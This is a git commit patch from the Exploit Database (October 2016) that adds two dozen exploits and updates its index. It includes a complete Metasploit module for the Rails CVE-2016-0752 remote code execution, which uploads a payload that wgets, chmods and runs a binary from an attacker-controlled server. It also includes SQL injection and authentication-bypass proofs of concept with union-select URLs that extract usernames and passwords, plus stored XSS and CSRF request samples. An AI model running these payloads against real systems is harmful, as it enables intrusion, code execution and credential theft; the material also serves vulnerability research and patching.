From 558ab1fc677e64308ca9aa9ea99f2aa4b55837ae Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 18 Oct 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-10-18 24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125) --- files.csv | 30 ++- platforms/multiple/remote/40561.rb | 200 +++++++++++++++++++ platforms/php/webapps/40479.txt | 1 - platforms/php/webapps/40542.txt | 68 +++++++ platforms/php/webapps/40543.txt | 68 +++++++ platforms/php/webapps/40544.txt | 55 +++++ platforms/php/webapps/40545.txt | 85 ++++++++ platforms/php/webapps/40546.txt | 45 +++++ platforms/php/webapps/40547.txt | 54 +++++ platforms/php/webapps/40552.txt | 103 ++++++++++ platforms/php/webapps/40553.txt | 249 +++++++++++++++++++++++ platforms/php/webapps/40554.txt | 75 +++++++ platforms/php/webapps/40555.txt | 51 +++++ platforms/php/webapps/40557.html | 58 ++++++ platforms/php/webapps/40558.txt | 45 +++++ platforms/php/webapps/40559.txt | 85 ++++++++ platforms/win_x86-64/shellcode/40549.c | 144 +++++++++++++ platforms/win_x86/shellcode/40560.asm | 266 +++++++++++++++++++++++++ platforms/windows/dos/40536.py | 147 ++++++++++++++ platforms/windows/local/40535.txt | 32 +++ platforms/windows/local/40538.txt | 43 ++++ platforms/windows/local/40539.txt | 32 +++ platforms/windows/local/40540.txt | 47 +++++ platforms/windows/local/40541.txt | 31 +++ platforms/windows/local/40550.txt | 45 +++++ platforms/windows/local/40562.cpp | 192 ++++++++++++++++++ 26 files changed, 2247 insertions(+), 4 deletions(-) create mode 100755 platforms/multiple/remote/40561.rb create mode 100755 platforms/php/webapps/40542.txt create mode 100755 platforms/php/webapps/40543.txt create mode 100755 platforms/php/webapps/40544.txt create mode 100755 platforms/php/webapps/40545.txt create mode 100755 platforms/php/webapps/40546.txt create mode 100755 platforms/php/webapps/40547.txt create mode 100755 platforms/php/webapps/40552.txt create mode 100755 platforms/php/webapps/40553.txt create mode 100755 platforms/php/webapps/40554.txt create mode 100755 platforms/php/webapps/40555.txt create mode 100755 platforms/php/webapps/40557.html create mode 100755 platforms/php/webapps/40558.txt create mode 100755 platforms/php/webapps/40559.txt create mode 100755 platforms/win_x86-64/shellcode/40549.c create mode 100755 platforms/win_x86/shellcode/40560.asm create mode 100755 platforms/windows/dos/40536.py create mode 100755 platforms/windows/local/40535.txt create mode 100755 platforms/windows/local/40538.txt create mode 100755 platforms/windows/local/40539.txt create mode 100755 platforms/windows/local/40540.txt create mode 100755 platforms/windows/local/40541.txt create mode 100755 platforms/windows/local/40550.txt create mode 100755 platforms/windows/local/40562.cpp diff --git a/files.csv b/files.csv index 539a0fba6..68f4e6756 100755 --- a/files.csv +++ b/files.csv @@ -36597,7 +36597,8 @@ id,file,description,date,author,platform,type,port 40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0 -40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0 +40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0 +40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0 @@ -36611,7 +36612,7 @@ id,file,description,date,author,platform,type,port 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 -40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0 +40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0 40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0 @@ -36645,5 +36646,28 @@ id,file,description,date,author,platform,type,port 40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0 40531,platforms/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps,0 40532,platforms/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps,0 -40533,platforms/windows/local/40533.txt,"NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0 +40533,platforms/windows/local/40533.txt,"NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0 40534,platforms/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps,0 +40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0 +40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0 +40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0 +40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0 +40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0 +40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0 +40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0 +40544,platforms/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0 +40545,platforms/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0 +40546,platforms/php/webapps/40546.txt,"Fashion Shopping Cart 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0 +40547,platforms/php/webapps/40547.txt,"Health Record System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0 +40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40550,platforms/windows/local/40550.txt,"Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation",2016-10-17,Amir.ght,windows,local,0 +40552,platforms/php/webapps/40552.txt,"PHP Telephone Directory - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0 +40553,platforms/php/webapps/40553.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting",2016-10-17,"Ahsan Tahir",php,webapps,80 +40554,platforms/php/webapps/40554.txt,"PHP Image Database - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0 +40555,platforms/php/webapps/40555.txt,"Simple Shopping Cart Application 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0 +40557,platforms/php/webapps/40557.html,"PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)",2016-10-16,"Meryem AKDOĞAN",php,webapps,0 +40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0 +40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0 +40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 +40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0 +40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0 diff --git a/platforms/multiple/remote/40561.rb b/platforms/multiple/remote/40561.rb new file mode 100755 index 000000000..4882db3fb --- /dev/null +++ b/platforms/multiple/remote/40561.rb @@ -0,0 +1,200 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in the explicit render + method when leveraging user parameters. + This module has been tested across multiple versions of Ruby on Rails. + The technique used by this module requires the specified + endpoint to be using dynamic render paths, such as the following example: + + def show + render params[:id] + end + + Also, the vulnerable target will need a POST endpoint for the TempFile upload, this + can literally be any endpoint. This module doesnt use the log inclusion method of + exploitation due to it not being universal enough. Instead, a new code injection + technique was found and used whereby an attacker can upload temporary image files + against any POST endpoint and use them for the inclusion attack. Finally, you only + get one shot at this if you are testing with the builtin rails server, use caution. + }, + 'Author' => + [ + 'mr_me ', # necromanced old bug & discovered new vector rce vector + 'John Poulin (forced-request)' # original render bug finder + ], + 'References' => + [ + [ 'CVE', '2016-0752'], + [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch + [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 + [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'bsd'], + 'Arch' => ARCH_X86, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Privileged' => false, + 'Targets' => + [ + [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 16 2016')) + register_options( + [ + Opt::RPORT(3000), + OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]), + OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), + ], self.class) + end + + def check + + # this is the check for the dev environment + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], "%2f"), + 'method' => 'GET', + }, 60) + + # if the page controller is dynamically rendering, its for sure vuln + if res and res.body =~ /render params/ + return CheckCode::Vulnerable + end + + # this is the check for the prod environment + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"), + 'method' => 'GET', + }, 60) + + # if we can read files, its likley we can execute code + if res and res.body =~ /ruby/ + return CheckCode::Appears + end + return CheckCode::Safe + end + + def on_request_uri(cli, request) + if (not @pl) + print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") + return + end + print_status("#{rhost}:#{rport} - Sending the payload to the server...") + @elf_sent = true + send_response(cli, @pl) + end + + def send_payload + @bd = rand_text_alpha(8+rand(8)) + fn = rand_text_alpha(8+rand(8)) + un = rand_text_alpha(8+rand(8)) + pn = rand_text_alpha(8+rand(8)) + register_file_for_cleanup("/tmp/#{@bd}") + cmd = "wget #{@service_url} -O /tmp/#{@bd};" + cmd << "chmod 755 /tmp/#{@bd};" + cmd << "/tmp/#{@bd}" + pay = "<%=`#{cmd}`%>" + print_status("uploading image...") + data = Rex::MIME::Message.new + data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"') + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => @cookie, + 'uri' => normalize_uri(datastore['URIPATH'], pn), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/ + @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/ + return true + else + + # this is where we pull the log file + if leak_log + return true + end + end + return false + end + + def leak_log + + # path to the log /proc/self/fd/7 + # this bypasses the extension check + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"), + 'method' => 'GET', + }, 60) + + if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/ + @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/ + return true + end + return false + end + + def start_http_server + @pl = generate_payload_exe + @elf_sent = false + downfile = rand_text_alpha(8+rand(8)) + resource_uri = '/' + downfile + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + # do not use SSL for the attacking web server + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" + service_url_payload = srv_host + resource_uri + print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + datastore['SSL'] = true if ssl_restore + connect + end + + def render_tmpfile + @path.gsub!(/\//, '%2f') + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], @path), + 'method' => 'GET', + }, 1) + end + + def exploit + print_status("Sending initial request to detect exploitability") + start_http_server + if send_payload + print_good("injected payload") + render_tmpfile + + # we need to delay, for the stager + select(nil, nil, nil, 5) + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40479.txt b/platforms/php/webapps/40479.txt index bee9b8624..014be0ff2 100755 --- a/platforms/php/webapps/40479.txt +++ b/platforms/php/webapps/40479.txt @@ -3,7 +3,6 @@ | Software : Entrepreneur Job Portal Script | Version : 2.06 | Vendor : http://www.i-netsolution.com/ - | Demo : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208 | Date : 07 October 2016 | Author : OoN_Boy [x]========================================================================================================================================[x] diff --git a/platforms/php/webapps/40542.txt b/platforms/php/webapps/40542.txt new file mode 100755 index 000000000..e93aaf9a3 --- /dev/null +++ b/platforms/php/webapps/40542.txt @@ -0,0 +1,68 @@ +# Exploit Title............... Student Information System (SIS) Auth Bypass +# Google Dork................. N/A +# Date........................ 14/10/2016 +# Exploit Author.............. lahilote +# Vendor Homepage............. http://www.sourcecodester.com/php/10902/student-information-system-sis.html +# Software Link............... http://www.sourcecodester.com/sites/default/files/download/Bwire%20Charles/ucc.zip +# Version..................... 0.1 +# Tested on................... xampp +# CVE......................... N/A + + +The audit_list in ucc/admin_login.php +------------------------------------- + +----snip---- + +error_reporting(E_ALL ^ E_DEPRECATED); +if(isset($_POST['submit'])) { + +include 'database_config2.php'; +$myusername = $_POST['username']; +$mypassword = $_POST['password']; + + + + +$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'"; +$result = mysql_query($query); +$count = mysql_num_rows($result); +mysql_close(); + +----snip---- + +You can login with username and password: admin' or '1'='1 + + +How to fix +---------- +One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string. +It causes that every of this characters \x00, \n, \r, \, ' +get's replaced with a simple Backslash „/“, so the attackers commands become useless. + + Example: + +error_reporting(E_ALL ^ E_DEPRECATED); +if(isset($_POST['submit'])) { + +include 'database_config2.php'; +$myusername = mysql_real_escape_string($_POST['username']); +$mypassword = mysql_real_escape_string($_POST['password']); + + + + +$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'"; +$result = mysql_query($query); +$count = mysql_num_rows($result); +mysql_close(); + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10902/student-information-system-sis.html +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40543.txt b/platforms/php/webapps/40543.txt new file mode 100755 index 000000000..e2abbbc79 --- /dev/null +++ b/platforms/php/webapps/40543.txt @@ -0,0 +1,68 @@ +# Exploit Title.............. Web Based Alumni Tracking System Multiple Vulnerability +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/John%20Mark%20Ulep/web-based_alumni_tracking_system.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /admin/print_employed.php +------------------------------- + +----snip---- + +48 + +----snip---- + +/admin/index.php +---------------- + +----snip---- + +$user = $_POST['username']; +$password = $_POST['password']; + + +$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error()); + +----snip---- + + +Example exploitation +-------------------- +http://server/path_to_webapp/admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user--+ + +http://server/path_to_webapp/admin/index.php +Login with username and password: admin' or '1'='1 + + +How to fix +---------- +Simple method's use the php function intval and mysql_real_escape_string. + + Example: /admin/print_employed.php + + 48 + + + Example: /admin/index.php + +$user = mysql_real_escape_string($_POST['username']); +$password = mysql_real_escape_string($_POST['password']); + + +$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error()); + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html +http://php.net/manual/en/function.intval.php +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40544.txt b/platforms/php/webapps/40544.txt new file mode 100755 index 000000000..c51cab97d --- /dev/null +++ b/platforms/php/webapps/40544.txt @@ -0,0 +1,55 @@ +# Exploit Title.............. Simple Dynamic Web SQL Injection +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /page.php + +----snip---- + + $prodID = $_GET['prodid']; + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $ptitle = $getProdInfo["title"]; + $pdes = $getProdInfo["description"]; + $pimg = $getProdInfo["imgUrl"]; + } + +----snip---- + +Example exploitation +-------------------- +http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+ + +How to fix +---------- +Simple method's use the php function intval. +For example + + $prodID = intval($_GET['prodid']); + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $ptitle = $getProdInfo["title"]; + $pdes = $getProdInfo["description"]; + $pimg = $getProdInfo["imgUrl"]; + } + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40545.txt b/platforms/php/webapps/40545.txt new file mode 100755 index 000000000..6d44faa41 --- /dev/null +++ b/platforms/php/webapps/40545.txt @@ -0,0 +1,85 @@ +# Exploit Title.............. Learning Management System Auth Bypass +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/7339/learning-management-system.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/jkev/lms.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in lms/login.php +------------------------------- + +----snip---- + + $username = $_POST['username']; + $password = $_POST['password']; + /* student */ + $query = "SELECT * FROM student WHERE username='$username' AND password='$password'"; + $result = mysql_query($query)or die(mysql_error()); + $row = mysql_fetch_array($result); + $num_row = mysql_num_rows($result); + /* teacher */ + $query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error()); + $num_row_teacher = mysql_num_rows($query_teacher); + $row_teahcer = mysql_fetch_array($query_teacher); + if( $num_row > 0 ) { + +----snip---- + +lms/admin/login.php +------------------- + +----snip---- + + $username = $_POST['username']; + $password = $_POST['password']; + + $query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error()); + $count = mysql_num_rows($query); + $row = mysql_fetch_array($query); + +----snip---- + +You can login with username and password: admin' or '1'='1 + +How to fix +---------- +One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string. +It causes that every of this characters \x00, \n, \r, \, ' +get's replaced with a simple Backslash „/“, so the attackers commands become useless. + + Example: lms/login.php + + $username = mysql_real_escape_string($_POST['username']); + $password = mysql_real_escape_string($_POST['password']); + /* student */ + $query = "SELECT * FROM student WHERE username='$username' AND password='$password'"; + $result = mysql_query($query)or die(mysql_error()); + $row = mysql_fetch_array($result); + $num_row = mysql_num_rows($result); + /* teacher */ + $query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error()); + $num_row_teacher = mysql_num_rows($query_teacher); + $row_teahcer = mysql_fetch_array($query_teacher); + if( $num_row > 0 ) { + + Example: lms/admin/login.php + + $username = mysql_real_escape_string($_POST['username']); + $password = mysql_real_escape_string($_POST['password']); + + $query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error()); + $count = mysql_num_rows($query); + $row = mysql_fetch_array($query); + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/7339/learning-management-system.html +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40546.txt b/platforms/php/webapps/40546.txt new file mode 100755 index 000000000..5070f0cdc --- /dev/null +++ b/platforms/php/webapps/40546.txt @@ -0,0 +1,45 @@ +# Exploit Title.............. Fashion Shopping Cart SQL Injection +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/node/10435 +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /admin/dd.php +------------------------------- + +----snip---- + +$q=$_GET["q"]; + +$sql="SELECT * FROM subcategory WHERE cat_id ='$q'"; + +----snip---- + +Example exploitation +-------------------- +http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+ + + +How to fix +---------- +Simple method's use the php function intval. +For example + +$q=intval($_GET["q"]); + +$sql="SELECT * FROM subcategory WHERE cat_id ='$q'"; + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/node/10435 +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40547.txt b/platforms/php/webapps/40547.txt new file mode 100755 index 000000000..485dbbca1 --- /dev/null +++ b/platforms/php/webapps/40547.txt @@ -0,0 +1,54 @@ +# Exploit Title.............. Health Record System Auth Bypass +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/node/10430 +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Jesutoyeboluwatife/vital.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in vital/signin.php +------------------------------- + +----snip---- + +if (isset($_POST['submit'])){ + $lga_id=$_POST['lgaid']; +$pw=$_POST['pwd']; +$_SESSION['username'] = $lga_id; + + + $sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' "); + +----snip---- + +You can login with username and password: admin' or '1'='1 + + +How to fix +---------- +One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string. +It causes that every of this characters \x00, \n, \r, \, ' +get's replaced with a simple Backslash „/“, so the attackers commands become useless. + + Example: + +if (isset($_POST['submit'])){ + $lga_id=mysql_real_escape_string($_POST['lgaid']); +$pw=mysql_real_escape_string($_POST['pwd']); +$_SESSION['username'] = $lga_id; + + + $sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' "); + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/node/10430 +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40552.txt b/platforms/php/webapps/40552.txt new file mode 100755 index 000000000..36a676e97 --- /dev/null +++ b/platforms/php/webapps/40552.txt @@ -0,0 +1,103 @@ +# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities +# Date: 2016-10-16 +# Exploit Author: larrycompress +# Contact: larrycompress@gmail.com +# Type: webapps +# Platform: PHP +# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2 +# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip +--------------------------------------------------------------------------------- + +POC as follows : + +# 0x00 Reflected XSS + +--- + +1.In public search : + +http://192.168.1.112/phptelephonedirectory/index.php?key= + +2.In administration web interface (need normal user login) : + +http://192.168.1.112/phptelephonedirectory/administration.php?key= + +# 0x01 Stored XSS + +--- + +1.In administration web directory interface (need normal user login) : + +http://192.168.1.112/phptelephonedirectory/administration.php +?pageaction=newcontact +&subaction=submit +&id=1 +&dtDOBDate=0000-00-00 +&pointcode= +&firstname= +&lastname= +&middlename= +&DOBdateradio=usenew +&dateday=16 +&datemonthnewedit=10 +&dateyearnewedit=2015 +&employeeID= +&phonenumber1= +&internalphonenumber= +&phonenumber2= +&phonenumber3= +&fax= +&mobilecell= +&email= +&alternateemail= +&chat= +&website= +&socialmedia1= +&socialmedia2= +&socialmedia3= +&contactposition= +&company= +&qualifications= +&departmentnewedit= +&buildingroom= +&address= +&city= +&suburb= +&tdstate= +&zippostcode= +&description= +&recordstatus=active + +2.In administration web department interface (need normal user login) : + +http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname= +
+ + + + + + + + +
